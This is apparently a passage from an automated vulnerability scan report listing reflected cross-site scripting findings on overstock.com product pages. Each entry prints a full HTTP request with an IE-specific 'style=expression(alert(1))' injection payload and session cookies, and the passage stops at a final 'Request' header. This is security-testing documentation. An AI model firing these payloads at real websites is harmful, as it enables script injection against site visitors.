GET /Home-Garden/Laura-Ashley-600-gram-6-piece-Towel-Set/4692862/product.html?46c35"style%3d"x%3aexpression(alert(1))"241b647ee02=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.280. http://www.overstock.com/Home-Garden/Laura-Ashley-8-piece-Emilie-Bed-in-a-Bag-with-Sheet-Set/3703422/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cdfc"style%3d"x%3aexpression(alert(1))"9b6342b56a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6cdfc"style="x:expression(alert(1))"9b6342b56a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Laura-Ashley-8-piece-Emilie-Bed-in-a-Bag-with-Sheet-Set/3703422/product.html?6cdfc"style%3d"x%3aexpression(alert(1))"9b6342b56a7=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.281. http://www.overstock.com/Home-Garden/Laura-Ashley-Sophia-8-piece-Bed-in-a-Bag-with-Sheet-Set/3703412/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb795"style%3d"x%3aexpression(alert(1))"09c0223b49a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb795"style="x:expression(alert(1))"09c0223b49a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Laura-Ashley-Sophia-8-piece-Bed-in-a-Bag-with-Sheet-Set/3703412/product.html?fb795"style%3d"x%3aexpression(alert(1))"09c0223b49a=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.282. http://www.overstock.com/Home-Garden/Luxe-Versailles-Rivoli-Iridescent-Silk-California-King-size-Comforter-Set/5162289/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cebf"style%3d"x%3aexpression(alert(1))"b60eaf6f1dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4cebf"style="x:expression(alert(1))"b60eaf6f1dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Luxe-Versailles-Rivoli-Iridescent-Silk-California-King-size-Comforter-Set/5162289/product.html?4cebf"style%3d"x%3aexpression(alert(1))"b60eaf6f1dc=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.283. http://www.overstock.com/Home-Garden/Luxury-800-Gram-Egyptian-Cotton-Towels-6-piece-Set/4368066/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88376"style%3d"x%3aexpression(alert(1))"fcde9f702d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 88376"style="x:expression(alert(1))"fcde9f702d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Luxury-800-Gram-Egyptian-Cotton-Towels-6-piece-Set/4368066/product.html?88376"style%3d"x%3aexpression(alert(1))"fcde9f702d9=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.284. http://www.overstock.com/Home-Garden/Luxury-Satin-Corded-Down-Throw/4466690/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9ee5"style%3d"x%3aexpression(alert(1))"9c3b5255ed6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9ee5"style="x:expression(alert(1))"9c3b5255ed6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Luxury-Satin-Corded-Down-Throw/4466690/product.html?b9ee5"style%3d"x%3aexpression(alert(1))"9c3b5255ed6=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.285. http://www.overstock.com/Home-Garden/Luxury-Silk-Cotton-600-Thread-Count-Jacquard-Floral-Sheet-Set/5036547/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3304f"style%3d"x%3aexpression(alert(1))"0641e647460 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3304f"style="x:expression(alert(1))"0641e647460 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Luxury-Silk-Cotton-600-Thread-Count-Jacquard-Floral-Sheet-Set/5036547/product.html?3304f"style%3d"x%3aexpression(alert(1))"0641e647460=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.286. http://www.overstock.com/Home-Garden/Max-Collection-500-Thread-Count-Paisley-3-piece-Duvet-Cover-Set/5089953/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f266f"style%3d"x%3aexpression(alert(1))"6741186bba4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f266f"style="x:expression(alert(1))"6741186bba4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Max-Collection-500-Thread-Count-Paisley-3-piece-Duvet-Cover-Set/5089953/product.html?f266f"style%3d"x%3aexpression(alert(1))"6741186bba4=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.287. http://www.overstock.com/Home-Garden/Maxine-Printed-Paisley-Duvet-Set/3346958/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f03b4"style%3d"x%3aexpression(alert(1))"077ca931402 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f03b4"style="x:expression(alert(1))"077ca931402 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Maxine-Printed-Paisley-Duvet-Set/3346958/product.html?f03b4"style%3d"x%3aexpression(alert(1))"077ca931402=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.288. http://www.overstock.com/Home-Garden/Maxwell-8-piece-Comforter-Set/4733937/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25ced"style%3d"x%3aexpression(alert(1))"1d15572628c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 25ced"style="x:expression(alert(1))"1d15572628c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Maxwell-8-piece-Comforter-Set/4733937/product.html?25ced"style%3d"x%3aexpression(alert(1))"1d15572628c=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.289. http://www.overstock.com/Home-Garden/Maxwell-8-piece-Comforter-Set/4805918/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c525c"style%3d"x%3aexpression(alert(1))"00083399d12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c525c"style="x:expression(alert(1))"00083399d12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Maxwell-8-piece-Comforter-Set/4805918/product.html?c525c"style%3d"x%3aexpression(alert(1))"00083399d12=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.290. http://www.overstock.com/Home-Garden/Merlot-Clusters-Printed-Tablecloth/5103130/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b759e"style%3d"x%3aexpression(alert(1))"7b42dc45967 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b759e"style="x:expression(alert(1))"7b42dc45967 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Merlot-Clusters-Printed-Tablecloth/5103130/product.html?b759e"style%3d"x%3aexpression(alert(1))"7b42dc45967=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.291. http://www.overstock.com/Home-Garden/Merlot-Foyer-Table-with-Drawer-and-Shelf/3714754/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c656"style%3d"x%3aexpression(alert(1))"756feb21534 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c656"style="x:expression(alert(1))"756feb21534 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Merlot-Foyer-Table-with-Drawer-and-Shelf/3714754/product.html?1c656"style%3d"x%3aexpression(alert(1))"756feb21534=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.292. http://www.overstock.com/Home-Garden/Michael-Kors-Taos-3-piece-Duvet-Set/4397998/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2ee0"style%3d"x%3aexpression(alert(1))"5d7f4683d18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2ee0"style="x:expression(alert(1))"5d7f4683d18 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Michael-Kors-Taos-3-piece-Duvet-Set/4397998/product.html?b2ee0"style%3d"x%3aexpression(alert(1))"5d7f4683d18=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.293. http://www.overstock.com/Home-Garden/Microfiber-4-piece-Reversible-Comforter-Set/2594098/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f922"style%3d"x%3aexpression(alert(1))"23bb9d5f488 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f922"style="x:expression(alert(1))"23bb9d5f488 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
